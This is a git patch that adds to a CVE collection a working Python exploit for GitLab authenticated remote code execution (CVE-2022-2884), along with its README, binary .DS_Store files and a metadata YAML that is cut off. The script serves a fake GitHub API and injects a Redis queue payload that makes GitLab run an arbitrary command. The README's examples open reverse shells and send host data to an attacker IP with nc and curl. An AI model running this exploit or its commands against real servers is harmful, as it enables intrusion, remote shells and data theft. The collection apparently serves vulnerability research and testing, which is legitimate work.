From 60d7020c2da90ef32c8ac3f9572ac1169e334eb7 Mon Sep 17 00:00:00 2001 From: shizhongli Date: Mon, 13 Mar 2023 10:46:53 +0800 Subject: [PATCH 1/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=20CVE-2022-2884?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .DS_Store | Bin 0 -> 8196 bytes cve/.DS_Store | Bin 0 -> 8196 bytes cve/gitlab/.DS_Store | Bin 0 -> 6148 bytes cve/gitlab/2022/.DS_Store | Bin 0 -> 8196 bytes cve/gitlab/2022/CVE-2022-2884/.DS_Store | Bin 0 -> 6148 bytes .../2022/CVE-2022-2884/CVE-2022-2884.py | 609 ++++++++++++++++++ cve/gitlab/2022/CVE-2022-2884/README.md | 118 ++++ cve/gitlab/2022/yaml/.DS_Store | Bin 0 -> 6148 bytes cve/gitlab/2022/yaml/CVE-2022-2884.yaml | 21 + openkylin_list.yaml | 1 + 10 files changed, 749 insertions(+) create mode 100644 .DS_Store create mode 100644 cve/.DS_Store create mode 100644 cve/gitlab/.DS_Store create mode 100644 cve/gitlab/2022/.DS_Store create mode 100644 cve/gitlab/2022/CVE-2022-2884/.DS_Store create mode 100755 cve/gitlab/2022/CVE-2022-2884/CVE-2022-2884.py create mode 100644 cve/gitlab/2022/CVE-2022-2884/README.md create mode 100644 cve/gitlab/2022/yaml/.DS_Store create mode 100644 cve/gitlab/2022/yaml/CVE-2022-2884.yaml diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..e8dee0a9e293190936798406b3cd85f3af26f472 GIT binary patch literal 8196 zcmeHMOK%iM5U#Qfo{a&Iu^k%}(2~7G!ZHS&NKq8AUfTkThaInD>=?4l?6jAOXS-K3 zV;f^x+B2N^0sI3bu91*9^9yo|_z7_3fK2scVIQ#~E(k=o)cw^|S5;Sk^Q>I}z`|y5 z9$*vz9O@F?J{ta`$$8m3T9?rrB}DQEQT8L@(~;X@YZaCO%YbFTGGH0741698&^uc; z=YaRVp0%T8z%uYvG9aH1S?Ut=2J0Htqk{%j0uc6)S~Zf@$3J0KDhTri>l#Tz4Yezw zc12TSps5{DyVHE$*w-~`cR;l=#W5?RsZh|A9+*|;fO(B}vaTb8Z*!itS?RrJG5?i`V4Q zk`R&KkUf7nWZNZoXj<^p3ptCGLl`hJxpgz-f!HpHO&%o5x2PwajFTz3qr1D46X(aW zlaoL0jb(R#zA!=Z#h>=}GR|=B+%Jozji}1S1HDZ&j|z}`Y;F(f!0aY0Z<*cT^Tuvo zx^81XnQ!`z96i?W4jdmG7#bMKWM>)oE89b`7teKT+A#mESSQ;UsuVY+ zV?mk{RA?MRnxCV1D4YP0qiZI(6vrF!{Ip!ec zR8#qEzz#$z=aRyNG9D+LN7+ZMQRwUdJkj_4{yxe56eWebYES>~Eg3c5Bmrb#k+PkF z89L{)v}P58*7X#(Egqu3dit+3@s)!zM9JNI5BvUCJlnxC@UaYZYlqQ3!r6m=|Nq#q z*4{E;8Tf)2z@C}nOo0+^d|b8XE^F;9^*hvMlXi8D%7q41juWcaG2#0^3`x$Csr1Pk UtZO66upzA_PTE9CXGWXK(g=)q6N|tkPt#OZV^}oC5@xtC@p4pJ#klA?^wI* zByAMQ&+xw00HEzZ5wy>r9zTN0wn3_(b=Kw*%q1fpBNgX22+56fg=H1&jhlf&YU7 z_|2BZdcyC%o;9sez$oxsDj@HNI;ynI)K0WjR|guE0>Ca{SQYe<2PjTGwawH{v{h8B zsj~-`Qdyc}FippNUBY3Tshw!6>BKahSn8Rj846S0!K*7cv8J}BH3}F7W)+aRdx;zx zp?Zbz^Lv>a{1?_ejz{Txjvw7o;K#}O z`Y&v5e&JlHY?ZC5b+2<@9Cs2Y8OJRr+Lxbpgb3Ve-*I<+e%!NHZi+B*{E$bA;P*Ko zcR%;TzBq1)aoCR)x1%SlidE^^Yp16h>({QgCm!diEvP@eT)(-0e*fh^Q5e`TijC`<;>F`Qf0O@ROwDKjb}oxd7ef{VyI5 z?K~I(v+{UAE%$N6d8pRgJUEDX((Tz7V=odxuq9$Y@kO|oncce^L+f_Jhwbn{z~d2g z-W*9-yvw5)c81@*7dS2tHp7-k5;5F!qR0scy!AjLiX!*vovn}p`~mz zZ%;d~>5fee-65*jtg<7es5F{e>7Yed5ICRFE*{Z`^bLKBVEKuDreEoI`iqs>W%eq& z!Zz3k><0UUwb^amAnQPZkzeJTq;wIWE3L2G;!>V)~_R&8K(XRt4InC5gw8aR@(|-|wl)?P|EA375 H{3`Gdmov2g literal 0 HcmV?d00001 diff --git a/cve/gitlab/.DS_Store b/cve/gitlab/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..0b72f7195dfee94607f8ed7c4a8d622fc0354da1 GIT binary patch literal 6148 zcmeHK%}x|S5UzqnW` zOmtE63lZZ&Pf45hbP%GLW7g#r+vPU(#e}iM48#ol+YE?rHvtonB^^KU{Z7%?weM17 z5mDU4iMWH`#o5iEuJ?m?cHMP?Fq{2|ZS9GUbDc(~(QT|3pYvuhw8BPEu>4igTjJcc zBipi<9o8(HgVWp#EyrWNOmM1bD`Jl>mTSF>`SFmLl;v+BSV+U=74QgHfz3k(rNB;zu-35YRz}5#ky5-yjm$_ zFT$d;%gSc|iO@w>eR||t+No2_;E_X4ci(5slk?4QYy>PUmCfFu;&azs;DHl5+*|o+ zbY(3do@Yb0HS29~T5+2=p0A6rV43*=;i>%6x@+0Yo%aen4EffI<@=UbV}%_NDQ2s1 zZ^36`rjkRps3kM`Rk4`K&qc;nWtfmr20+rp%Ft4$tP;MR6$SVM0g4|NbmcRalY2hHuYiubb z4+*MNLY0d8ih=s(fGVBF^E$qzP^AOPm1!QmGU^)&>Wc@aWjJ77VcfO&|KmwTS;J;!36Enq`0+poC)>Flavo=loj8uq-Yblf|)ac__8saD( dCY3^CX<-oNHMSIzha~a8v?3DZ14JQ=B?>nH=awcFkP1izqyka_slb1z06w#sDMvi_ z#i*>M0#bo6)8k8vNX0y!1u6xjpusl-n) zh@j)R#@rF(K2`+^IuJnz;;&5n42AI3k*9HYAaQ}RmI_D(4l2NM_cj=XSs2Hxy*_`B zz%WFU7R_ZXnnf=bSP!t=+~$U@!!y?3VmBKW9sp>3ZSt z57N-sbm3yN(yX*7i>YN=PILzq&p1qr))XLV{dUn<{${DqLl-izd+J?gkX5K)T zg=eOnr{x4)wev3Lro?~}Py!jXw^F$~93Irdn}eEYMZ!Zvo0|b87`kjAo*0=;FhY^wivk7(%N>pUG3=X>getW27^7l!Jht} zD;c#btLIh<4!iVGYEdU)ts3(M$IPcndd{>9Y0r4&rOXW@qjv6doi_3>cDrWQOX$txdo|! zRNyEDNYhwqEPNd5MJ?^Q#Kv6s&kUj>yw-#GOA3v8|yiTh?fJBXwltD?8g3cWUzrsJl?1P76AyHAl zuC+V2cRN0L3hx~NnQoV7Km}k(SHzQszUjJp&-P+QQS2RKoMO!9g#I&AZiP$SVP>pP z{sa@8V}uPJuU6~De6^liE##Q^@*2kR0dB~?K!a=I2oG59FrIf9Ow&?MV673;v((S98adVJUQfub76c9$TQ$m_t?kt;NDD$%JD zR}67F=S$Spfvuy{A+|H$6FW=XP{elUe6ey!?U*qYNCmnI?0Z^i|DVynx&L=bnWX}$ zz@Jh;2F-0V 65535: + raise ValueError("Invalid attacker TCP port!") + + if len(args.command.strip()) < 1: + raise ValueError("Invalid command!") + + if args.delay is not None and args.delay <= 0.0: + raise ValueError("Invalid delay!") + +def generate_random_string(length): + letters = string.ascii_lowercase + string.ascii_uppercase + string.digits + return ''.join(random.choice(letters) for i in range(length)) + +def generate_random_lowercase_string(length): + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(length)) + +def generate_random_number(length): + letters = string.digits + result = "0" + while result.startswith("0"): + result = ''.join(random.choice(letters) for i in range(length)) + return result + +def base64encode(to_encode): + return base64.b64encode(to_encode.encode("ascii")).decode("ascii") + +def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id): + logging.info("Sending request to target GitLab.") + protocol = "http" + if is_https: + protocol += "s" + headers = { + "Content-Type": "application/json", + "PRIVATE-TOKEN": private_token, + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" + } + fake_personal_access_token = "ghp_" + generate_random_string(36) + new_name = generate_random_lowercase_string(8) + logging.debug("Random generated parameters of the request:") + logging.debug(f" fake_repo_id = {fake_repo_id}") + logging.debug(f"fake_personal_access_token = {fake_personal_access_token}") + logging.debug(f" new_name = {new_name}") + payload = { + "personal_access_token": fake_personal_access_token, + "repo_id": fake_repo_id, + "target_namespace": target_namespace, + "new_name": new_name, + "github_hostname": f"{protocol}://{address}:{port}" + } + target_endpoint = f"{url}" + if not target_endpoint.endswith("/"): + target_endpoint = f"{target_endpoint}/" + target_endpoint = f"{target_endpoint}api/v4/import/github" + try: + r = requests.post(target_endpoint, headers=headers, json=payload) + logging.debug("Response:") + logging.debug(f"status_code = {r.status_code}") + logging.debug(f" text = {r.text}") + logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).") + if r.status_code != 201: + logging.fatal("Wrong response received from the target GitLab.") + logging.debug(f" text = {r.text}") + raise Exception("Wrong response received from the target GitLab.") + except: + logging.fatal("Error in contacting the target GitLab.") + raise Exception("Error in contacting the target GitLab.") + +def is_server_alive(address, port, is_https): + protocol = "http" + if is_https: + protocol += "s" + try: + r = requests.get(f"{protocol}://{address}:{port}/") + if r.status_code == 200 and "The server is running." in r.text: + return True + else: + return False + except: + return False + +def start_fake_github_server(address, port, is_https, command, fake_repo_id): + app.config["address"] = address + app.config["port"] = port + protocol = "http" + if is_https: + protocol += "s" + app.config["attacker_server"] = f"{protocol}://{address}:{port}" + app.config["command"] = command + app.config["fake_user"] = generate_random_lowercase_string(8) + app.config["fake_user_id"] = generate_random_number(8) + app.config["fake_repo"] = generate_random_lowercase_string(8) + app.config["fake_repo_id"] = fake_repo_id + app.config["fake_issue_id"] = generate_random_number(9) + app.run("0.0.0.0", port) + +def encode_command(command): + encoded_command = "" + for c in command: + encoded_command += ("<< " + str(ord(c)) + ".chr ") + + encoded_command += "<<" + logging.debug(f"encoded_command = {encoded_command}") + return encoded_command + +def generate_rce_payload(command): + logging.debug("Crafting RCE payload:") + logging.debug(f" command = {command}") + encoded_command = encode_command(command) # Useful in order to prevent escaping hell... + rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\"" + logging.debug(f" rce_payload = {rce_payload}") + return rce_payload + +def generate_user_response(attacker_server, fake_user, fake_user_id): + response = { + "avatar_url": f"{attacker_server}/avatars/{fake_user_id}", + "events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}", + "followers_url": f"{attacker_server}/users/{fake_user}/followers", + "following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}", + "gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}", + "gravatar_id": "", + "html_url": f"{attacker_server}/{fake_user}", + "id": int(fake_user_id), + "login": f"{fake_user}", + "node_id": base64encode(f"04:User{fake_user_id}"), + "organizations_url": f"{attacker_server}/users/{fake_user}/orgs", + "received_events_url": f"{attacker_server}/users/{fake_user}/received_events", + "repos_url": f"{attacker_server}/users/{fake_user}/repos", + "site_admin": False, + "starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}", + "subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions", + "type": "User", + "url": f"{attacker_server}/users/{fake_user}" + } + return response + +def generate_user_full_response(attacker_server, fake_user, fake_user_id): + partial = generate_user_response(attacker_server, fake_user, fake_user_id) + others = { + "bio": None, + "blog": "", + "company": None, + "created_at": "2020-08-21T14:35:46Z", + "email": None, + "followers": 2, + "following": 0, + "hireable": None, + "location": None, + "name": None, + "public_gists": 0, + "public_repos": 0, + "twitter_username": None, + "updated_at": "2022-08-08T12:11:40Z", + } + response = {**partial, **others} + return response + +def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id): + response = { + "allow_auto_merge": False, + "allow_forking": True, + "allow_merge_commit": True, + "allow_rebase_merge": True, + "allow_squash_merge": True, + "allow_update_branch": False, + "archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}", + "archived": False, + "assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}", + "blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}", + "branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}", + "clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git", + "collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}", + "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}", + "commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}", + "compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}", + "contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}", + "contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors", + "created_at": "2021-04-09T13:55:55Z", + "default_branch": "main", + "delete_branch_on_merge": False, + "deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments", + "description": None, + "disabled": False, + "downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads", + "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events", + "fork": False, + "forks": 1, + "forks_count": 1, + "forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks", + "full_name": f"{fake_user}/{fake_repo}", + "git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}", + "git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}", + "git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}", + "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git", + "has_downloads": True, + "has_issues": True, + "has_pages": False, + "has_projects": True, + "has_wiki": True, + "homepage": None, + "hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks", + "html_url": f"{attacker_server}/{fake_user}/{fake_repo}", + "id": int(repo_id), + "is_template": False, + "issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}", + "issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}", + "issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}", + "keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}", + "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}", + "language": "Python", + "languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages", + "license": None, + "merge_commit_message": "Message", + "merge_commit_title": "Title", + "merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges", + "milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}", + "mirror_url": None, + "name": f"{fake_repo}", + "network_count": 1, + "node_id": base64encode(f"010:Repository{repo_id}"), + "notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}", + "open_issues": 4, + "open_issues_count": 4, + "owner": generate_user_response(attacker_server, fake_user, fake_user_id), + "permissions": { + "admin": True, + "maintain": True, + "pull": True, + "push": True, + "triage": True + }, + "private": True, + "pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}", + "pushed_at": "2022-08-14T15:36:21Z", + "releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}", + "size": 3802, + "squash_merge_commit_message": "Message", + "squash_merge_commit_title": "Title", + "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git", + "stargazers_count": 0, + "stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers", + "statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}", + "subscribers_count": 1, + "subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers", + "subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription", + "svn_url": f"{attacker_server}/{fake_user}/{fake_repo}", + "tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags", + "teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams", + "temp_clone_token": generate_random_string(32), + "topics": [], + "trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}", + "updated_at": "2022-06-10T15:12:53Z", + "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}", + "use_squash_pr_title_as_default": False, + "visibility": "private", + "watchers": 0, + "watchers_count": 0, + "web_commit_signoff_required": False + } + return response + +def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command): + rce_payload = generate_rce_payload(command) + response = [ + { + "active_lock_reason": None, + "assignee": None, + "assignees": [], + "author_association": "OWNER", + "body": "hn-issue description", + "closed_at": None, + "comments": 1, + "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments", + "created_at": "2021-07-23T13:16:55Z", + "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events", + "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3", + "id": int(fake_issue_id), + "labels": [], + "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}", + "locked": False, + "milestone": None, + "node_id": base64encode(f"05:Issue{fake_issue_id}"), + "_number": 1, + "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }}, + "performed_via_github_app": None, + "reactions": { + "+1": 0, + "-1": 0, + "confused": 0, + "eyes": 0, + "heart": 0, + "hooray": 0, + "laugh": 0, + "rocket": 0, + "total_count": 0, + "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions" + }, + "repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test", + "state": "open", + "state_reason": None, + "timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline", + "title": f"{fake_repo}", + "updated_at": "2022-08-14T15:37:08Z", + "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3", + "user": generate_user_response(attacker_server, fake_user, fake_user_id) + } + ] + return response + +@app.before_request +def received_request(): + logging.debug(f"Received request:") + logging.debug(f" url = {request.url}") + logging.debug(f"headers = {request.headers}") + +@app.after_request +def add_headers(response): + response.headers["content-type"] = "application/json; charset=utf-8" + response.headers["x-ratelimit-limit"] = "5000" + response.headers["x-ratelimit-remaining"] = "4991" + response.headers["x-ratelimit-reset"] = "1660136749" + response.headers["x-ratelimit-used"] = "9" + response.headers["x-ratelimit-resource"] = "core" + return response + +@app.route("/") +def index(): + return "The server is running." + +@app.route("/api/v3/rate_limit") +def api_rate_limit(): + response = { + "resources": { + "core": { + "limit": 5000, + "used": 9, + "remaining": 4991, + "reset": 1660136749 + }, + "search": { + "limit": 30, + "used": 0, + "remaining": 30, + "reset": 1660133589 + }, + "graphql": { + "limit": 5000, + "used": 0, + "remaining": 5000, + "reset": 1660137129 + }, + "integration_manifest": { + "limit": 5000, + "used": 0, + "remaining": 5000, + "reset": 1660137129 + }, + "source_import": { + "limit": 100, + "used": 0, + "remaining": 100, + "reset": 1660133589 + }, + "code_scanning_upload": { + "limit": 1000, + "used": 0, + "remaining": 1000, + "reset": 1660137129 + }, + "actions_runner_registration": { + "limit": 10000, + "used": 0, + "remaining": 10000, + "reset": 1660137129 + }, + "scim": { + "limit": 15000, + "used": 0, + "remaining": 15000, + "reset": 1660137129 + }, + "dependency_snapshots": { + "limit": 100, + "used": 0, + "remaining": 100, + "reset": 1660133589 + } + }, + "rate": { + "limit": 5000, + "used": 9, + "remaining": 4991, + "reset": 1660136749 + } + } + return response + +@app.route("/api/v3/repositories/") +@app.route("/repositories/") +def api_repositories_repo_id(repo_id: int): + address = current_app.config["address"] + port = current_app.config["port"] + attacker_server = current_app.config["attacker_server"] + fake_user = current_app.config["fake_user"] + fake_user_id = current_app.config["fake_user_id"] + fake_repo = current_app.config["fake_repo"] + response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id) + return response + +@app.route("/api/v3/repos//") +def api_repositories_repo_user_repo(user: string, repo: string): + address = current_app.config["address"] + port = current_app.config["port"] + attacker_server = current_app.config["attacker_server"] + fake_user_id = current_app.config["fake_user_id"] + fake_repo_id = current_app.config["fake_repo_id"] + response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id) + return response + +@app.route("/api/v3/repos///issues") +def api_repositories_repo_user_repo_issues(user: string, repo: string): + attacker_server = current_app.config["attacker_server"] + fake_user_id = current_app.config["fake_user_id"] + fake_issue_id = current_app.config["fake_issue_id"] + command = current_app.config["command"] + response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command) + return response + +@app.route("/api/v3/users/") +def api_users_user(user: string): + attacker_server = current_app.config["attacker_server"] + fake_user_id = current_app.config["fake_user_id"] + response = generate_user_full_response(attacker_server, user, fake_user_id) + return response + +@app.route("//.git/HEAD") +@app.route("//.git/info/refs") +@app.route("//.wiki.git/HEAD") +@app.route("//.wiki.git/info/refs") +def empty_response(user: string, repo: string): + logging.debug("Empty string response.") + return "" + +# All the others/non-existing routes. +@app.route('/') +def catch_all(path): + logging.debug("Empty JSON array response.") + return [] + +def main(): + args = parse_arguments() + logging_level = DEFAULT_LOGGING_LEVEL + if args.verbose: + logging_level = logging.DEBUG + logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s") + + validate_input(args) + url = args.url.strip() + private_token = args.private_token.strip() + target_namespace = args.target_namespace.strip() + address = args.address.strip() + port = args.port + is_https = args.https + command = args.command.strip() + delay = args.delay + logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}") + logging.debug("Parameters:") + logging.debug(f" url = {url}") + logging.debug(f" private_token = {private_token}") + logging.debug(f"target_namespace = {target_namespace}") + logging.debug(f" address = {address}") + logging.debug(f" port = {port}") + logging.debug(f" is_https = {is_https}") + logging.debug(f" command = {command}") + logging.debug(f" delay = {delay}") + + fake_repo_id = generate_random_number(9) + + fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id)) + fake_github_server.start() + + logging.info("Waiting for the fake GitHub server to start.") + while not is_server_alive(address, port, is_https): + time.sleep(1) + logging.debug("Waiting for the fake GitHub server to start.") + logging.info("Fake GitHub server is running.") + + try: + send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id) + except: + logging.critical("Aborting the script.") + fake_github_server.kill() + sys.exit(1) + + if delay is not None: + logging.info(f"Waiting for {delay} seconds to let attack finish.") + time.sleep(delay) + else: + logging.info("Press Enter when the attack is finished.") + input() + + logging.debug("Stopping the fake GitHub server.") + fake_github_server.kill() + + logging.info("Closing the script.") + +if __name__ == "__main__": + main() diff --git a/cve/gitlab/2022/CVE-2022-2884/README.md b/cve/gitlab/2022/CVE-2022-2884/README.md new file mode 100644 index 00000000..d6f24d6e --- /dev/null +++ b/cve/gitlab/2022/CVE-2022-2884/README.md @@ -0,0 +1,118 @@ +# gitlab_rce_cve-2022-2884 + +This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884. + +## DISCLAIMER + +**This tool is intended for security engineers and appsec people for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.** + +## Vulnerability info + +* **CVE-ID**: CVE-2022-2884 +* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884) +* **Description**: A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. +* **Vendor link**: [https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/) + +## Help + +``` +$ ./gitlab_rce_cve-2022-2884.py --help +usage: gitlab_rce_cve-2022-2884.py [-h] -u URL -pt PRIVATE_TOKEN [-tn TARGET_NAMESPACE] -a ADDRESS [-p PORT] [-s] -c COMMAND [-d DELAY] [-v] + +Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - v1.0 (2022-12-25) + +optional arguments: + -h, --help show this help message and exit + -u URL, --url URL URL of the victim GitLab + -pt PRIVATE_TOKEN, --private-token PRIVATE_TOKEN + private token of GitLab + -tn TARGET_NAMESPACE, --target-namespace TARGET_NAMESPACE + target namespace of GitLab (default is 'root') + -a ADDRESS, --address ADDRESS + IP address of the attacker machine + -p PORT, --port PORT TCP port of the attacker machine (default is 1337) + -s, --https set if the attacker machine is exposed via HTTPS + -c COMMAND, --command COMMAND + the command to execute + -d DELAY, --delay DELAY + seconds of delay to wait for the exploit to complete + -v, --verbose verbose mode +``` + +## Examples + +``` +./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "id | nc 1.2.3.4 6669" +``` + +``` +./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" +``` + +``` +./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "(hostname; ps aux) | curl 1.2.3.4:6669 -X POST --data-binary @- " +``` + +``` +./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "echo 'test' > /tmp/test" +``` + +``` +./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" -d 180 +``` + +``` +./gitlab_rce_cve-2022-2884.py -v -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -p 1337 -c "nc 1.2.3.4 6669 -e /bin/bash" +``` + +``` +./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -tn root -a 1.2.3.4 -p 1337 -s -c "nc 1.2.3.4 6669 -e /bin/bash" +``` + +## Vulnerable application + +A vulnerable application can be setup with the following commands. + +``` +export GITLAB_HOME=/srv/gitlab +docker run --detach --rm \ + --hostname gitlab.example.com \ + --publish 443:443 --publish 80:80 --publish 22:22 \ + --name vuln-gitlab \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + --shm-size 256m \ + gitlab/gitlab-ce:15.3.0-ce.0 +``` + +It might take a while before the Docker container starts to respond to queries. Then connect to `http://localhost`. + +Sign in with the username `root` and the password from the following command. + +``` +docker exec -it vuln-gitlab grep 'Password:' /etc/gitlab/initial_root_password +``` + +To test the exploit locally, you have to add `--network="host"` to the `docker run` command and to remove constraints for outbound requests on GitLab: +* connect to [http://localhost/admin/application_settings/network](http://localhost/admin/application_settings/network); +* expand "*Outbound requests*" section; +* tick "*Allow requests to the local network from web hooks and services*"; +* add `127.0.0.1` to the "*Local IP addresses and domain names that hooks and services may access*" textbox; +* save changes. + +The prerequisite of the exploit is to have a private token on GitLab: +* connect to [http://localhost/-/profile/personal_access_tokens](http://localhost/-/profile/personal_access_tokens); +* generate a token with at least `api` scope. + +## Authors + +* **Antonio Francesco Sardella** - *main implementation* - [m3ssap0](https://github.com/m3ssap0) + +## License + +See the [LICENSE](LICENSE) file for details. + +## Acknowledgments + +* [yvvdwf](https://hackerone.com/reports/1672388), the security researcher who discovered the vulnerability. diff --git a/cve/gitlab/2022/yaml/.DS_Store b/cve/gitlab/2022/yaml/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..27cc9322c24e34d626ee6d47b92acb86940adfb4 GIT binary patch literal 6148 zcmeHKyG{c!5FA5_NHh@@rGJ2koKQr0gruNGqJ}_uC{+qNe-IL%c+Bh?#EGK>3AAf@ zXKnAUeIuP80McszxBzAVrmVswV?@+FI&@H-g~@U>I77p73g-S3qO~963b)vB)t}eD zz>@7bo^g*Sbl2VPVcYGt^cPu|tn=Q4)_9Hv7cA%B=6Ge?i|6Qj%MvOW2nK?IU?3Ry zc?Ni9OQuJTp@V^7AQ<>yK>I^x6}Ama@*w8+5VuL=OWz(;%SR9o_{T5D) Oi+~XlDj4_$2HpUoyelFA literal 0 HcmV?d00001 diff --git a/cve/gitlab/2022/yaml/CVE-2022-2884.yaml b/cve/gitlab/2022/yaml/CVE-2022-2884.yaml new file mode 100644 index 00000000..07aab66b --- /dev/null +++ b/cve/gitlab/2022/yaml/CVE-2022-2884.yaml @@ -0,0 +1,21 @@ +id: CVE-2022-2884 +source: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: critical + description: | + 